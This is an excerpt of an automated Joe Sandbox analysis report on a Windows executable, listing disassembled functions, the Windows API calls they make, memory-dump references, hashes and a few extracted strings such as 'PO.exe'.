                        • Instruction Fuzzy Hash: BAF0EC72501624A7CB613FA4DC49FBE7B9CEF14B91F100126FD8896041D6A18D41E7F6

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1362 c71d7b-c71d9c call c81bc0 1365 c71da5 1362->1365 1366 c71d9e-c71da3 1362->1366 1367 c71da7-c71dc4 1365->1367 1366->1365 1366->1367 1368 c71dc6 1367->1368 1369 c71dcc-c71dd6 1367->1369 1368->1369 1370 c71ddb-c71e06 CreateFileW 1369->1370 1371 c71dd8 1369->1371 1372 c71e6a-c71e7f 1370->1372 1373 c71e08-c71e2a GetLastError call c73283 1370->1373 1371->1370 1374 c71e81-c71e94 call c75c1f 1372->1374 1375 c71e99-c71ea4 1372->1375 1379 c71e2c-c71e4e CreateFileW GetLastError 1373->1379 1380 c71e59-c71e5e 1373->1380 1374->1375 1381 c71e54-c71e57 1379->1381 1382 c71e50 1379->1382 1380->1372 1383 c71e60 1380->1383 1381->1372 1381->1380 1382->1381 1383->1372
                        APIs
                        • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,-00000001,00000000), ref: 00C71DFB
                        • GetLastError.KERNEL32(?,?,00000000,00000003,-00000001,00000000), ref: 00C71E08
                        • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,00000000,00000003,-00000001,00000000), ref: 00C71E3D
                        • GetLastError.KERNEL32(?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,00000000,00000003,-00000001,00000000), ref: 00C71E45
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: CreateErrorFileLast
                        • String ID:
                        • API String ID: 1214770103-0
                        • Opcode ID: 461b60e9fffca10ff312a9b217b1604c9dac9b78afba43d4b15cb6c784d1c3ed
                        • Instruction ID: e6f04cca9dd679b1be661017a2caa5aea7a312fd3d1d515d93e931bb007d051a
                        • Opcode Fuzzy Hash: 461b60e9fffca10ff312a9b217b1604c9dac9b78afba43d4b15cb6c784d1c3ed
                        • Instruction Fuzzy Hash: 873139708407816FD3219F288C49BEABBE8FB45314F188619FDA8871C1D7759988DBD0
                        APIs
                        • GetStdHandle.KERNEL32(000000F6), ref: 00C71C73
                        • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00C71C8B
                        • GetLastError.KERNEL32 ref: 00C71CBD
                        • GetLastError.KERNEL32 ref: 00C71CDC
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: ErrorLast$FileHandleRead
                        • String ID:
                        • API String ID: 2244327787-0
                        • Opcode ID: cfe2447a643c6b67c32b4771c6bc67960231e055a0279a10ebb996234014d61c
                        • Instruction ID: 11014ba76ebe467e5c24c825f01300d4e5d8410aa5589aa768f7dc9079554376
                        • Opcode Fuzzy Hash: cfe2447a643c6b67c32b4771c6bc67960231e055a0279a10ebb996234014d61c
                        • Instruction Fuzzy Hash: D7115A35980614EFCB229FE9C944A6977ADFB15321F18C12AED2E85290D730CE40DB52
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00C86E7B,00000000,00000000,?,00C8C5E4,00C86E7B,00000000,00000000,00000000,?,00C8C7E1,00000006,FlsSetValue), ref: 00C8C66F
                        • GetLastError.KERNEL32(?,00C8C5E4,00C86E7B,00000000,00000000,00000000,?,00C8C7E1,00000006,FlsSetValue,00C984D8,00C984E0,00000000,00000364,?,00C8B1F4), ref: 00C8C67B
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00C8C5E4,00C86E7B,00000000,00000000,00000000,?,00C8C7E1,00000006,FlsSetValue,00C984D8,00C984E0,00000000), ref: 00C8C689
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: LibraryLoad$ErrorLast
                        • String ID:
                        • API String ID: 3177248105-0
                        • Opcode ID: e068907d6eb0d01ac48676ace355996f041a81e4796f5c518e43da786e193574
                        • Instruction ID: acb7829787995e49e44ec73573a2f4495545c6d21f140c1e6746127024646cd2
                        • Opcode Fuzzy Hash: e068907d6eb0d01ac48676ace355996f041a81e4796f5c518e43da786e193574
                        • Instruction Fuzzy Hash: CA01F732641622ABC7225A799C88B5E7798AF057657201231F91AD7180EB30D900C7F8
                        APIs
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00C7E7F3
                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C7E804
                        • TranslateMessage.USER32(?), ref: 00C7E80E
                        • DispatchMessageW.USER32(?), ref: 00C7E818
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: Message$DispatchPeekTranslate
                        • String ID:
                        • API String ID: 4217535847-0
                        • Opcode ID: 72940928b04931cce24fa117535a72a1a150ef90178ca549f984e16703419ce0
                        • Instruction ID: ab8a089e8bafd5436487d25642aafe61b4ec2a41487d19db2f54bf4376a9946d
                        • Opcode Fuzzy Hash: 72940928b04931cce24fa117535a72a1a150ef90178ca549f984e16703419ce0
                        • Instruction Fuzzy Hash: A0E05972D0212EB78B20ABE6AC4CFDF7F6CEE066A1B01456BB51DD2050D6249516C7F1
                        APIs
                        • _memcmp.LIBVCRUNTIME ref: 00C78630
                          • Part of subcall function 00C79058: __EH_prolog.LIBCMT ref: 00C7905D
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C7834F
                          • Part of subcall function 00C79058: new.LIBCMT ref: 00C790B6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: H_prologUnothrow_t@std@@@__ehfuncinfo$??2@_memcmp
                        • String ID: PO.exe
                        • API String ID: 2326347333-3005272355
                        • Opcode ID: 90597ee59536622addecd25ad1a088c6b45bb3a2b21f1f2e2597de4b017471ec
                        • Instruction ID: e745bd42426d97e197e20208e7bd6593aebc824a1d9ad2f4d8a8754e277eea38
                        • Opcode Fuzzy Hash: 90597ee59536622addecd25ad1a088c6b45bb3a2b21f1f2e2597de4b017471ec
                        • Instruction Fuzzy Hash: B0B11870588241DFD724EB28EC89B2D3BA5F781714F048359FE69832B2DA309D49E756
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: PO.exe
                        • API String ID: 3519838083-3005272355
                        • Opcode ID: c4360dc537fe6ff244bd292fb30abe902d29c71b919dc1d7b67018cc26bd530d
                        • Instruction ID: ec194f34420ebf87da73f9c0d3b8aaeb69c81000eb3256962267be7963c3e488
                        • Opcode Fuzzy Hash: c4360dc537fe6ff244bd292fb30abe902d29c71b919dc1d7b67018cc26bd530d
                        • Instruction Fuzzy Hash: 7011A370A102449BDF24FB749C06BFD73A9EF45314F008169BC5DE7192DB758A41B651
                        APIs
                        • GetStdHandle.KERNEL32(000000F5), ref: 00C721A5
                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00C721E5
                        • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00C72212
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: FileWrite$Handle
                        • String ID:
                        • API String ID: 4209713984-0
                        • Opcode ID: 65cb377a3867284298ce192bee47883443a340db226ead4d61a5341e63c9eb1f
                        • Instruction ID: 11219df2cd911613e2d10f81beae37ef3315d851a7a131e6c7ffc8cb01db8163
                        • Opcode Fuzzy Hash: 65cb377a3867284298ce192bee47883443a340db226ead4d61a5341e63c9eb1f
                        • Instruction Fuzzy Hash: EB310971548206AFDB209E24DC08FAAFBA8FB91310F04C619F6A9931D1C775ED59CBE1
                        APIs
                        • CreateDirectoryW.KERNELBASE(?,00000000,?), ref: 00C724A7
                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?), ref: 00C724DA
                        • GetLastError.KERNEL32(?,?), ref: 00C724F7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: CreateDirectory$ErrorLast
                        • String ID:
                        • API String ID: 2485089472-0
                        • Opcode ID: eb4d50e7a82093cbe72408666bb07cd6f4cc90d41fc2ef17c7f887b438bbebcb
                        • Instruction ID: bdb4d7619e1807776ecefd26af60ce5d4d7c83b0caad398519f7dc52625ca6ee
                        • Opcode Fuzzy Hash: eb4d50e7a82093cbe72408666bb07cd6f4cc90d41fc2ef17c7f887b438bbebcb
                        • Instruction Fuzzy Hash: 3301F73110025466DB726B744C49BFE735CAF0A781F08C442FD5ED6091DB68CB80E7A1
                        APIs
                        • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00C8D154
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: Info
                        • String ID:
                        • API String ID: 1807457897-3916222277
                        • Opcode ID: 6e63c4a8f8deeb3148b81b57e5975baed1dc47d8ad3ea33518651f6e5ae84a78
                        • Instruction ID: 11e95f136b3ba9c9912c8e5aeae1e928cb8a2fa676751d677a3692a508ed18dd
                        • Opcode Fuzzy Hash: 6e63c4a8f8deeb3148b81b57e5975baed1dc47d8ad3ea33518651f6e5ae84a78
                        • Instruction Fuzzy Hash: 91411970504348AADF21AE658C84BFABBBAEF4530CF1404EDE59B87182D235AE45DF24
                        APIs
                          • Part of subcall function 00C76FC5: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,?,00000000,?,00C72BD8,?,?,00000000,?,?,?), ref: 00C77017
                          • Part of subcall function 00C7DF59: SetCurrentDirectoryW.KERNELBASE(?,00C7E0EE,C:\Users\user\Desktop,00000000,00CB9732,00000006), ref: 00C7DF5D
                        • SHFileOperationW.SHELL32(?,?,?,?,?,00CB9732,00000006), ref: 00C7E140
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: CompareCurrentDirectoryFileOperationString
                        • String ID: C:\Users\user\Desktop
                        • API String ID: 3543741193-1246513382
                        • Opcode ID: f5079f88d997b131798f8b56d8185f67dcdff06b1b4afb06c312caa7a13af807
                        • Instruction ID: 8faf6baac37d630e884ef3ea5cd7534f1345ec3071331363bde5e9d1a89880bf
                        • Opcode Fuzzy Hash: f5079f88d997b131798f8b56d8185f67dcdff06b1b4afb06c312caa7a13af807
                        • Instruction Fuzzy Hash: E3017171D1021866DB21ABA4DC4AFEF73FCEF08344F004466F609E3191EAB496859BE5
                        APIs
                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,91E85006,00000001,?,000000FF), ref: 00C8C8E6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: String
                        • String ID: LCMapStringEx
                        • API String ID: 2568140703-3893581201
                        • Opcode ID: 9b9568a2eeebc440c34147d3753d1cd7e741267eecbb693561c72e1210e8a740
                        • Instruction ID: ea15c9942375e08312016912faa386a03097ab5445c80382f966e48de7421bdc
                        • Opcode Fuzzy Hash: 9b9568a2eeebc440c34147d3753d1cd7e741267eecbb693561c72e1210e8a740
                        • Instruction Fuzzy Hash: 3E01E932540209FBCF026F90DC05EEF3F66EF49764F014125FE1966161CA729975EB94
                        APIs
                        • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00C8BE9D), ref: 00C8C85E
                        Strings
                        • InitializeCriticalSectionEx, xrefs: 00C8C82E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: CountCriticalInitializeSectionSpin
                        • String ID: InitializeCriticalSectionEx
                        • API String ID: 2593887523-3084827643
                        • Opcode ID: 9c41193da944deee040b6a11414b4a61230789f8e1e45005e6d4c7b56050c9d2
                        • Instruction ID: 31214a541de893f23b51c8a5911190f345548f955d5edc393b968c5f4ee404f3
                        • Opcode Fuzzy Hash: 9c41193da944deee040b6a11414b4a61230789f8e1e45005e6d4c7b56050c9d2
                        • Instruction Fuzzy Hash: 7EF0B431680218BBCF016F51DC0DEAE7F61EF44724B004039FD195A1A0CE724E21A794
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: Alloc
                        • String ID: FlsAlloc
                        • API String ID: 2773662609-671089009
                        • Opcode ID: 615073e5eb2bf6f33467f2368582fe23a632e187ce983f1d12ab469befa5e4b3
                        • Instruction ID: 4c041b10f74ddc16fc69e08156f041b51b03c45bdc752123fffb39af9f274cec
                        • Opcode Fuzzy Hash: 615073e5eb2bf6f33467f2368582fe23a632e187ce983f1d12ab469befa5e4b3
                        • Instruction Fuzzy Hash: ABE02B31661618A78B01BF519C1EB6E7B99DF48721F000179FC0967290DDB16E0197ED
                        APIs
                        • try_get_function.LIBVCRUNTIME ref: 00C8699F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: try_get_function
                        • String ID: FlsAlloc
                        • API String ID: 2742660187-671089009
                        • Opcode ID: 828e6e0ea65399fc51a202076799631b37d8dbf2f3dc5bad69243fa212687a57
                        • Instruction ID: 79d85d90dc2622c1ad8850494e50c49063d41dbead377d6c5e0fd3c72b426e8f
                        • Opcode Fuzzy Hash: 828e6e0ea65399fc51a202076799631b37d8dbf2f3dc5bad69243fa212687a57
                        • Instruction Fuzzy Hash: 89D05E32B81638B2991132D66C0BBADBE44CB00FF6F040072FF0C692C2D5A2591063ED
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 00C81B57
                          • Part of subcall function 00C818A5: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C81922
                          • Part of subcall function 00C818A5: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C81933
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                        • String ID: 3So
                        • API String ID: 1269201914-1105799393
                        • Opcode ID: cad356be7067ac68f0be743a2854d9ad24f233e6081160ba41066ac7b201621b
                        • Instruction ID: 94fe88e10cf790d118265f95d03457832776389938a4e4003b60b7afb7afd131
                        • Opcode Fuzzy Hash: cad356be7067ac68f0be743a2854d9ad24f233e6081160ba41066ac7b201621b
                        • Instruction Fuzzy Hash: 51B012D2298201BF3904310E6C4BC3B119DC2E0F14334813FF801C40C0A4401C83213A
                        APIs
                          • Part of subcall function 00C8D057: GetOEMCP.KERNEL32(00000000,?,?,00C8D2E0,?), ref: 00C8D082
                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00C8D325,?,00000000), ref: 00C8D4F8
                        • GetCPInfo.KERNEL32(00000000,00C8D325,?,?,?,00C8D325,?,00000000), ref: 00C8D50B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: CodeInfoPageValid
                        • String ID:
                        • API String ID: 546120528-0
                        • Opcode ID: d58ac43f37128dda54beb14edff7393db153122674f7dcef6fc1ebbc2d47f4cf
                        • Instruction ID: 5a13b4d1d19d907bc4ba71dc958a2a5e59412288ac665852ea79e9f3ce72670e
                        • Opcode Fuzzy Hash: d58ac43f37128dda54beb14edff7393db153122674f7dcef6fc1ebbc2d47f4cf
                        • Instruction Fuzzy Hash: 785134B09002059EDB20AF76C845BBBBBE5AF4130CF14446FE06B8B1D1E7349A46DB98
                        APIs
                          • Part of subcall function 00C8B122: GetLastError.KERNEL32(?,?,00C872DC,?,00000000,?,00C86E7B,00000200,00000000,?), ref: 00C8B126
                          • Part of subcall function 00C8B122: _free.LIBCMT ref: 00C8B159
                          • Part of subcall function 00C8B122: SetLastError.KERNEL32(00000000,00000000,?), ref: 00C8B19A
                          • Part of subcall function 00C8B122: _abort.LIBCMT ref: 00C8B1A0
                          • Part of subcall function 00C8D3E2: _abort.LIBCMT ref: 00C8D414
                          • Part of subcall function 00C8D3E2: _free.LIBCMT ref: 00C8D448
                          • Part of subcall function 00C8D057: GetOEMCP.KERNEL32(00000000,?,?,00C8D2E0,?), ref: 00C8D082
                        • _free.LIBCMT ref: 00C8D33B
                        • _free.LIBCMT ref: 00C8D371
                        Memory Dump Source
